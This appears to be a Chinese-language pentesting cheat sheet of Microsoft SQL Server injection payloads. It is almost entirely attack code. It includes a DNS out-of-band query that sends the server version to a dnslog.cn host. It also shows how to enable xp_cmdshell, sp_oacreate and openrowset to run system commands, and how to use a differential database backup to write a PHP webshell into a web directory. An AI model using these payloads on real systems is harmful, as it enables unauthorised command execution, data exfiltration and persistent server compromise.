SQLI

DNS带外

1
select * into temp_trc from fn_trace_gettable('\\'+(select @@version())+'.xxx.dnslog.cn\1.trc',default);

GETSHELL

xp_cmdshell

1
2
3
4
5
6
7
8
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

exec xp_cmdshell 'whoami';
-- 无需堆叠注入
id=1 if 1=1 waitfor delay '0:0:10';
id=1 execute('exec sp_configure ''show advanced options'', 
1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell 
''dir''');

sp_oacreate

1
2
3
EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c whoami > D:\1.txt'

openrowset

1
2
3
4
5
exec sp_configure 'show advanced options',1 reconfigure exec sp_configure 'Ad Hoc Distributed Queries',1 reconfigure

select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set 
fmtonly off 
exec master..xp_cmdshell ''dir c:''with RESULT SETS((a varchar(max)))')

其他执行命令

上面几个操作实战就差不多了,另外还有的操作可以参看这篇文章

差异备份文件getshell

执行命令的操作均需要管理员权限,但是备份数据库的操作dbo权限也可以尝试下

1
2
3
4
5
6
backup database users to disk='D:\phpstudy_pro\WWW\a.bak';
use users;
drop table cmd;
create table cmd(t TEXT);
insert into cmd(t) values('<?php phpinfo();/*');
backup database users to disk='D:\phpstudy_pro\WWW\shell.php' WITH DIFFERENTIAL,FORMAT;

Reference

https://xz.aliyun.com/t/7534
https://forum.90sec.com/t/topic/1113